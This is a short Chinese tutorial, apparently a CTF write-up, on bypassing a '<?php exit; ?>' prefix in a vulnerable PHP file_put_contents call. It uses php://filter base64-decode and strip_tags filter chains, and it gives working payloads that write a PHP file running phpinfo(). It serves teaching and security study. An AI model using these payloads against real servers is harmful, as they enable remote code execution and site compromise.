RCE编码绕过--php://filter妙用

目录

代码

如何绕过

payload构造

---

代码

<?php
$content = '<?php exit; ?>';
$content .= $_POST['txt'];
file_put_contents($_POST['filename'],$content); 

当你想要输入代码的时候前面会有<?php exit;?>;，代码没有办法执行下去，所以我们要想办法绕过

如何绕过

我们可以尝试使用php://filter/write=convert.base64-decode/resource=abc.php,在写入文件的时候对文件进行解码，然后我们后面POST传参的时候可以传一个base64编码，然后php://file解码的时候会将前面的<?php exit;?>解码成别的字符，然后将你输入的base64编码解码成原来的字符

<?php phpinfo();的编码

PD9waHAgcGhwaW5mbygpOw==

抓包提交参数，所提交的txt前面需要加一个a，这个的原因是base是4位一解码，txt前面加a是用来给<?php exit; ?>补位的

payload构造

txt=aPD9waHAgcGhwaW5mbygpOw==
filename=php://filter/write=convert.base64-decode/resource=abc.php

看一下我们的文件路径，多出一个abc.php文件且前面的<?php exit; ?>被编码成乱码了，然后后面的php代码就可以执行了

php://filter还有别的标签string.strip_tags,这个标签可以从字符串中去除 HTML 和 PHP 标记。

然后我们可以传一个base64的编码然后先去除，<?php exit; ?>标签然后再解码，php://filter可以使用多个过滤器

如下，这里txt前面就没有了a

txt=PD9waHAgcGhwaW5mbygpOw==
filename=php://filter/write=string.strip_tags|convert.base64-decode/resource=abc.php

结果